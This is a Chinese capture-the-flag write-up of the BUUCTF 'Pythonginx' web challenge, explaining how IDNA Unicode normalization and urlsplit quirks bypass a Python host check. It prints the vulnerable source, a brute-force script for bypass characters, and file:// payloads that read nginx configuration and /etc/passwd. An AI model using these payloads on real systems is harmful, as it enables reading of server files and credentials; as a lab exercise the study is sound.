BUUCTF WEB PYTHONGINX1

先验知识 NGINX配置文件地址：
配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx
配置文件目录为：/usr/local/nginx/conf/nginx.conf
简单粗暴的源码审计：

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():url = request.args.get("url")host = parse.urlparse(url).hostnameif host == 'suctf.cc':return "我扌 your problem? 111"parts = list(urlsplit(url))host = parts[1]if host == 'suctf.cc':return "我扌 your problem? 222 " + hostnewhost = []for h in host.split('.'):newhost.append(h.encode('idna').decode('utf-8'))parts[1] = '.'.join(newhost)#去掉 url 中的空格finalUrl = urlunsplit(parts).split(' ')[0]host = parse.urlparse(finalUrl).hostnameif host == 'suctf.cc':return urllib.request.urlopen(finalUrl).read()else:return "我扌 your problem? 333"

一个比较常见的思路是unicode编码逃逸
首先我们要搞清楚这个idna编码是个什么东西，简单来说就是 IDNA是一种以标准方式处理ASCII以外字符的一种机制，
它从unicode中提取字符，并允许非ASCII码字符以允许使用的ASCII字符表示。而编码问题很可能导致去向域名服务器查询的域名不是你本身想要的域名
说白了就是因为编码不统一而导致的一系列的问题
看这个，https://xz.aliyun.com/t/6070
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf
就比如这个payload:?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf,
他在经过urlparse和urlsplit的时候都是℆，但是经过了h.encode(‘idna’).decode(‘utf-8’)之后他就神奇的变成了c/u
然后再次进行parse的时候，就是suctf.cc/usr
至于这个字符是怎么找出来的，可以参考https://en.wiktionary.org/wiki/Appendix:Unicode/Letterlike_Symbols
当然你直接搜索idna和utf-8编码漏洞，绝大多数文章都会拿这个字符做例子
当然这题可以进行脚本爆破，unicode编码数值范围在1-65535之间，每个字符都可以通过chr转换成ascii码值，事实上查看idna编码原则的时候
也是这么说的，爆破出来的就是我们需要的payload,得到的结果最好url编码一下，否则可能会出错，当然，这题靶场时不时的会自己出毛病，得多试几次
脚本原文地址：https://blog.csdn.net/rfrder/article/details/109743728

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():for x in range(65536):uni=chr(x)url="http://suctf.c{}".format(uni)try:if getUrl(url):print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])except:passdef getUrl(url):url = urlhost = parse.urlparse(url).hostnameif host == 'suctf.cc':return Falseparts = list(urlsplit(url))host = parts[1]if host == 'suctf.cc':return Falsenewhost = []for h in host.split('.'):newhost.append(h.encode('idna').decode('utf-8'))parts[1] = '.'.join(newhost)finalUrl = urlunsplit(parts).split(' ')[0]host = parse.urlparse(finalUrl).hostnameif host == 'suctf.cc':return Trueelse:return Falseif __name__=="__main__":get_unicode()

至于第三种方法，我也是偷的，不得不说大佬思路就是广，?url=file:suctf.cc/etc/passwd，主要是我们在最后一轮验证的时候会先进行urlunsplit再进行urlsplit
这样就出现了一个问题，由于URLSPLIT函数不处理非标准url，所以再urlsplit的时候导致被截取成了//，hostname此时是空的
但是我们在urlunsplit的时候被拼接成了file://suctf.cc/etc/passwd，这就是一个标准的，所以再次urlsplit的时候hostname就成了suctf.cc
双写绕过的思想有木有？？？？
hint在/usr/local/nginx/conf/nginx.conf里，在这里可以找到flag的路径/usr/fffffflag
参考视频链接:https://www.bilibili.com/video/BV1Jr4y1m7zw/

BUUCTF WEB PYTHONGINX1相关推荐

BUUCTF WEB [BJDCTF2020]ZJCTF，不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号首先有点常识: 正常SQL语句这 ...
BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接持续更新ing~ BuuCTF平台文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip 在hint.php中找到一句注释 <!-- Do you know why i know your ip? -- ...
BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
BUUCTF web(一)
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题.MISC.密码学,多思考,提高一下自己做题的思路,以及代码审计.编写脚本的能力. [HCTF 2018]WarmUp 查看源码,发现&l ...

BUUCTF WEB PYTHONGINX1

BUUCTF WEB PYTHONGINX1相关推荐

最新文章

热门文章